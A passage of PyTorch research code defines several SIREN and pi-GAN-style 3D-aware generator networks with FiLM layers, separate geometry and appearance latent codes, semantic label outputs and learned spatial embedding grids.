SPATIALSIRENDISENTANGLE_debug(nn.Module): """Same architecture as TALLSIREN but use double latent codes""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_pre = nn.Sequential(nn.Linear(hidden_dim, hidden_dim)) # self.color_layer_sine = FiLMLayer(hidden_dim + 32, hidden_dim) # ray_drection dim: 3 --> 32 self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.dir_mapping_network = nn.Sequential( nn.Linear(3, 256), nn.Linear(256, 32) ) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.activation = nn.Softmax(dim=-1) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) # n_batch, n_pixel = input.shape[:2] # output = torch.zeros((n_batch, n_pixel, self.output_dim)).to(input) # for b in range(n_batch): # head = 0 # while head < n_pixel: # tail = head + self.max_batch_size # output[b:b+1, head:tail] = self.forward_with_frequencies_phase_shifts(input[b:b+1, head:tail], frequencies[b:b+1], phase_shifts[b:b+1], ray_directions[b:b+1, head:tail], **kwargs) # head += self.max_batch_size # return output return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 # TODO: 为什么做变换 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) sigma = self.final_layer(x) # ray_directions = self.dir_mapping_network(ray_directions) x = self.color_layer_pre(x) rbg = torch.cat([ray_directions, x], dim=-1) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1) class SPATIALSIRENAUGDISENTANGLE(nn.Module): """Same architecture as SPATIALSIRENDISENTANGLE but has augmented color branch and narrower density feature branch""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_pre = nn.Sequential( nn.Linear(hidden_dim, 3), ) # self.color_layer_sine = FiLMLayer(hidden_dim + 32, hidden_dim) # ray_drection dim: 3 --> 32 self.color_layer_sine = nn.ModuleList([ FiLMLayer(3 + 3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 # TODO: 为什么做变换 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) sigma = self.final_layer(x) x = self.color_layer_pre(x) rbg = torch.cat([ray_directions, x], dim=-1) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1) class RESSIRENDISENTANGLE(nn.Module): """ Same architecture as SIRENDISENTANGLE but use residual architecure code accroding to http://gvv.mpi-inf.mpg.de/projects/i3DMM/ """ def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.res_coord_layer = nn.Linear(hidden_dim, 3) self.density_layer_linear = nn.Sequential( nn.Linear(3, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, 1) ) self.color_layer_pre = nn.Sequential(nn.Linear(3, hidden_dim)) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) # self.dir_mapping_network = nn.Sequential( # nn.Linear(3, 256), # nn.Linear(256, 32) # ) self.network.apply(frequency_init(25)) self.density_layer_linear.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.activation = nn.Softmax(dim=-1) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) # n_batch, n_pixel = input.shape[:2] # output = torch.zeros((n_batch, n_pixel, self.output_dim)).to(input) # for b in range(n_batch): # head = 0 # while head < n_pixel: # tail = head + self.max_batch_size # output[b:b+1, head:tail] = self.forward_with_frequencies_phase_shifts(input[b:b+1, head:tail], frequencies[b:b+1], phase_shifts[b:b+1], ray_directions[b:b+1, head:tail], **kwargs) # head += self.max_batch_size # return output return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 # TODO: 为什么做变换 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) coords_res = self.res_coord_layer(x) input = input + coords_res sigma = self.density_layer_linear(input) # ray_directions = self.dir_mapping_network(ray_directions) rbg = self.color_layer_pre(input) rbg = torch.cat([ray_directions, rbg], dim=-1) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([rbg, sigma], dim=-1) class SPATIALSIRENSEMANTICDISENTANGLE(nn.Module): """Same architecture as TALLSIREN but use double latent codes and render semantic maps""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim - 4)) # output_dim = seg_channel + rgb_channel + density_channel self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.color_layer_sine[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 # TODO: 为什么做变换 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) sigma = self.final_layer(x) start += self.hidden_dim end += self.hidden_dim labels = self.label_layer_linear(x) # rbg = torch.cat([ray_directions, input, labels], dim=-1) rbg = torch.cat([ray_directions, x], dim=-1) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class SIRENBASELINESEMANTICDISENTANGLE(nn.Module): """Same architecture as TALLSIREN baseline but use double latent codes and render semantic maps""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim - 4)) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([ray_directions, x], dim=-1) sigma = self.final_layer(x) labels = self.label_layer_linear(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class SIRENBASELINESEMANTICDISENTANGLE_debug(nn.Module): """Same architecture as SIRENBASELINESEMANTICDISENTANGLE_debug except adding sigmoid to label""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, 19)) # 19 semantic labels self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([ray_directions, x], dim=-1) sigma = self.final_layer(x) labels = torch.sigmoid(self.label_layer_linear(x)) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class SPATIALSIRENSEMANTICHD(nn.Module): """Same architecture as SPATIALSIRENSEMANTIC but on a high resolution""" def __init__(self, input_dim=2, z_dim=100, hidden_dim=256, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_dim = z_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.max_batch_size = 2500 self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) self.label_layer_sine = FiLMLayer(hidden_dim, hidden_dim) self.label_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 64)) # 19 semantic labels self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 64)) self.mapping_network = CustomMappingNetwork(z_dim, 256, (len(self.network) + 2)*hidden_dim*2) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.label_layer_sine.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.network[0].apply(first_layer_film_sine_init) self.activation = nn.Softmax(dim=-1) self.gridwarper = UniformBoxWarp(0.24) # Don't worry about this, it was added to ensure compatibility with another model. Shouldn't affect performance. def forward(self, input, z, ray_directions, **kwargs): frequencies, phase_shifts = self.mapping_network(z) n_batch, n_pixel = input.shape[:2] return self.forward_with_frequencies_phase_shifts(input, frequencies, phase_shifts, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies, phase_shifts, ray_directions, **kwargs): frequencies = frequencies*15 + 30 input = self.gridwarper(input) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies[..., start:end], phase_shifts[..., start:end]) start += self.hidden_dim end += self.hidden_dim sigma = self.final_layer(x) labels = self.label_layer_sine(x, frequencies[..., start:end], phase_shifts[..., start:end]) # TODO: w. / w.o softmax activation on label labels = self.label_layer_linear(labels) start += self.hidden_dim end += self.hidden_dim rbg = self.color_layer_sine(torch.cat([ray_directions, x], dim=-1), frequencies[..., start:end], phase_shifts[..., start:end]) rbg = self.color_layer_linear(rbg) # rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class EmbeddingPiGAN128SEMANTICDISENTANGLE(nn.Module): """Smaller architecture that has an additional cube of embeddings. Often gives better fine details.""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=128, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(32 + 3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) # self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim-4) ) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(modified_first_sine_init) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.01) # !! Important !! Set this value to the expected side-length of your scene. e.g. for for faces, heads usually fit in # a box of side-length 0.24, since the camera has such a narrow FOV. For other scenes, with higher FOV, probably needs to be bigger. self.gridwarper = UniformBoxWarp(0.24) def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) shared_features = sample_from_3dgrid(input, self.spatial_embeddings) x = torch.cat([shared_features, input], -1) for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([ray_directions, x], dim=-1) sigma = self.final_layer(x) labels = self.label_layer_linear(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class TextureEmbeddingPiGAN128SEMANTICDISENTANGLE(nn.Module): """Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network""" def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, hidden_dim=128, output_dim=1, device=None): super().__init__() self.device = device self.input_dim = input_dim self.z_geo_dim = z_geo_dim self.z_app_dim = z_app_dim self.hidden_dim = hidden_dim self.output_dim = output_dim self.network = nn.ModuleList([ FiLMLayer(3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.final_layer = nn.Linear(hidden_dim, 1) # self.color_layer_sine = FiLMLayer(hidden_dim + 3, hidden_dim) self.color_layer_sine = nn.ModuleList([ FiLMLayer(hidden_dim+32+3, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), FiLMLayer(hidden_dim, hidden_dim), ]) self.color_layer_linear = nn.Sequential(nn.Linear(hidden_dim, 3)) self.geo_mapping_network = CustomMappingNetwork(z_geo_dim, 256, len(self.network)*hidden_dim*2) self.app_mapping_network = CustomMappingNetwork(z_app_dim, 256, len(self.color_layer_sine)*hidden_dim*2) self.label_layer_linear = nn.Sequential( nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, hidden_dim), nn.Linear(hidden_dim, self.output_dim-4) ) self.network.apply(frequency_init(25)) self.final_layer.apply(frequency_init(25)) self.color_layer_sine.apply(frequency_init(25)) self.color_layer_linear.apply(frequency_init(25)) self.label_layer_linear.apply(frequency_init(25)) self.network[0].apply(modified_first_sine_init) self.spatial_embeddings = nn.Parameter(torch.randn(1, 32, 96, 96, 96)*0.01) # !! Important !! Set this value to the expected side-length of your scene. e.g. for for faces, heads usually fit in # a box of side-length 0.24, since the camera has such a narrow FOV. For other scenes, with higher FOV, probably needs to be bigger. self.gridwarper = UniformBoxWarp(0.24) def forward(self, input, z_geo, z_app, ray_directions, **kwargs): frequencies_geo, phase_shifts_geo = self.geo_mapping_network(z_geo) frequencies_app, phase_shifts_app = self.app_mapping_network(z_app) return self.forward_with_frequencies_phase_shifts(input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs) def forward_with_frequencies_phase_shifts(self, input, frequencies_geo, frequencies_app, phase_shifts_geo, phase_shifts_app, ray_directions, **kwargs): frequencies_geo = frequencies_geo*15 + 30 frequencies_app = frequencies_app*15 + 30 input = self.gridwarper(input) shared_features = sample_from_3dgrid(input, self.spatial_embeddings) # x = torch.cat([shared_features, input], -1) x = input for index, layer in enumerate(self.network): start = index * self.hidden_dim end = (index+1) * self.hidden_dim x = layer(x, frequencies_geo[..., start:end], phase_shifts_geo[..., start:end]) rbg = torch.cat([ray_directions, shared_features, x], dim=-1) sigma = self.final_layer(x) labels = self.label_layer_linear(x) for index, layer in enumerate(self.color_layer_sine): start, end = index * self.hidden_dim, (index+1) * self.hidden_dim rbg = layer(rbg, frequencies_app[..., start:end], phase_shifts_app[..., start: end]) rbg = torch.sigmoid(self.color_layer_linear(rbg)) return torch.cat([labels, rbg, sigma], dim=-1) class TextureEmbeddingPiGAN256SEMANTICDISENTANGLE(TextureEmbeddingPiGAN128SEMANTICDISENTANGLE): """Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs, hidden_dim=256) self.spatial_embeddings = nn.Parameter(torch.randn(1,32,64,64,64)*0.1) class TextureEmbeddingPiGAN256SEMANTICDISENTANGLE_DIM_96(TextureEmbeddingPiGAN128SEMANTICDISENTANGLE): """Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs, hidden_dim=256) self.spatial_embeddings = nn.Parameter(torch.randn(1,32,96,96,96)*0.1) class TextureEmbeddingPiGAN128SEMANTICDISENTANGLE_WO_DIR(nn.Module): """ 1. Smaller architecture that has an additional cube of embeddings. Often gives better fine details. Embeddings are in color prediction branch instead of density network; 2. remove view direction 3. add more color layers """ def __init__(self, input_dim=2, z_geo_dim=100, z_app_dim=100, 